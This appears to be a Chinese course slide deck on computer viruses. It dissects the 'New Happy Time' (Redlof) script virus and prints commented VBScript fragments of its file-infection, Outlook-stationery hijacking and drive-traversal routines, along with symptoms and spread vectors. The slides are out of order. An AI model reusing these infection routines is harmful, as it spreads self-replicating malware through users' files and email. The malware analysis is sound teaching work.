计算机病毒与防治5-4“欢乐时光”病毒实例
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机病毒与防治课程小组
新欢乐时光代码分析
‘ 函数功能:向指定类型的指定文件追加病毒
Function KJAppendTo(FilePath,TypeStr) On Error Resume Next ' 以只读方式打开指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) ' 将文件内容读入到TmpStr变量中 TmpStr = ReadTemp.ReadAll ‘ 判断文件中是否存在“KJ_start()”字符串,若存在说明已经感染,退出函数;若文件长 度小于1,也退出函数。 If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then ReadTemp.Close Exit Function End If ‘ 如果传过来的类型是“htt“ , 在文件头加上调用页面的时候加载KJ_start()函数; 在文 件尾追加html版本的加密病毒体。如果是”html” : 在文件尾追加调用页面的时候加载 KJ_start()函数和html版本的病毒体; 如果是"vbs" : 在文件尾追加vbs版本的病毒体 If TypeStr = "htt" Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
计算机病毒与防治课程小组
新欢乐时光代码分析
‘功能:感染邮件部分
Function KJCreateMail() On Error Resume Next ' 如果当前执行文件是"html"的,就退出函数 If InWhere = "html" Then Exit Function End If ' 取系统盘的空白页的路径 ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm" ‘ 如果存在这个文件,就向其追加病毒体 ,否则生成含有病毒体的文件 If (FSO.FileExists(ShareFile)) Then Call KJAppendTo(ShareFile,"html") Else Set FileTemp = FSO.OpenTextFile(ShareFile,2,true) FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText FileTemp.Close End If
计算机病毒与防治课程小组
新欢乐时光代码分析
‘函数功能:改变子目录以及盘符
Function KJChangeSub(CurrentString,LastIndexChar) ' 判断是否是根目录 If LastIndexChar = 0 Then ‘ 如果是根目录 :如果是C:\,返回FinalyDisk盘,并将SubE置为0 ’如果不是C:\,返回将当前盘符递减1,并将SubE置为0 If Left(LCase(CurrentString),1) =< LCase("c") Then KJChangeSub = FinalyDisk & ":\" SubE = 0 Else KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\" SubE = 0 End If Else ‘ 如果不是根目录,则返回上一级目录名称 KJChangeSub = Mid(CurrentString,1,LastIndexChar) End If End Function
计算机病毒与防治课程小组
新欢乐时光代码分析
新欢乐时光病毒主运行程序代码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,Fi nalyDisk Sub KJ_start() ' 初始化变量 KJSetDim() ' 初始化环境 KJCreateMilieu() ' 感染本地或者共享上与html所在目录 KJLikeIt() ' 通过vbs感染Outlook邮件模板 KJCreateMail() ' 进行病毒传播 KJPropagate() End Sub
计算机病毒与防治课程小组
新欢乐时光代码分析
FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8) If TypeStr = "html" Then FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText ElseIf TypeStr = "vbs" Then FileTemp.Write vbCrLf & VbsText End If FileTemp.Close End If End Function
计算机病毒与防治课程小组
新欢乐时光代码分析
' 取得当前用户的ID和OutLook的版本 DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID") OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer") ' 激活信纸功能,并感染所有信纸 WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile) Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
感染这个病毒后有两个明显的特征: a.在每个目录中都会生成folder.htt(带毒文件)和desktop.ini(目录 配置文件); b.电脑运行速度明显变慢,在任务列表中可以看到有大量的Wscript.exe 程序在运行。
计算机病毒与防治课程小组
新欢乐时光病毒特点
新欢乐时光病毒——这个网页病毒利用微软IE的漏洞,通过感染一 些.html, .htm, .asp, .php, .jsp, .htt和.vbs等文件进行传播。 然而由于病毒的本身特性,其传播的途径也有多种: a.通过网页传播。由于病毒会感染网页文件,如果那些网站站长不小心将带毒的 网页放到网站上,用户不小心浏览了这些网页就会被病毒感染了; b.通过局域网。当本地计算机设有可写权限的共享目录,或者访问局域网上带毒 的计算机的时候就会感染病毒;对于Windows NT/2000系统,由于存在默认的管理用 共享目录,因此,管理员的疏忽也可能会造成感染。 c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸,或者信件中有带 毒的网页文件,那么,只要收件人浏览了邮件,也会被感染病毒; d.通过移动介质,如软盘、移动硬盘、光盘等。由于病毒会生成folder.htt和 desktop.ini,所以在打开移动介质或打开其文件夹的时候,就会激活并感染病毒。
计算机病毒与防治
Virus
计算机病毒与防治课程小组
5-4网页脚本病毒防治
5-4典型网页病毒剖析
欢乐时光病毒的特点及代码分析
欢乐时光病毒的手工清除
计算机病毒与防治课程小组
新欢乐时光病毒特点
新欢乐时光病毒特点
病毒名称:
新欢乐时光
英文名包括有:HTML.Redlof.A [Symantec], VBS.Redlof [AVP], VBS_REDLOF.A [Trend], VBS/Redlof-A [Sophos], VBS.KJ [金山], Script.RedLof [瑞星], VBS/KJ [江民] 病毒类型: 网页脚本病毒 危险级别: ★★★★★ 影响系统: Win 9X/ME/NT/2000
计算机病毒与防治课程小组
新欢乐时光代码分析
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPrefere nce",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank") WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPrefer ence",131072,"REG_DWORD" Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings \NewStationery","blank") KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery") End Function
计算机病毒与防治课程小组
新欢乐时光病毒Leabharlann 点新欢乐时光病毒是一个多变形、加密病毒,感染扩展名 为.html, .htm, .asp, .php, .jsp, .htt和.vbs文件,同时该病毒会大 量生成folder.htt和desktop.ini,并在%windir%System中生成一个名字 叫Kernel.dll(Windows 9x/Me)或kernel32.dll(Windows NT/2000)的 文件,修改.dll文件的打开方式,感染Outlook的信纸文件。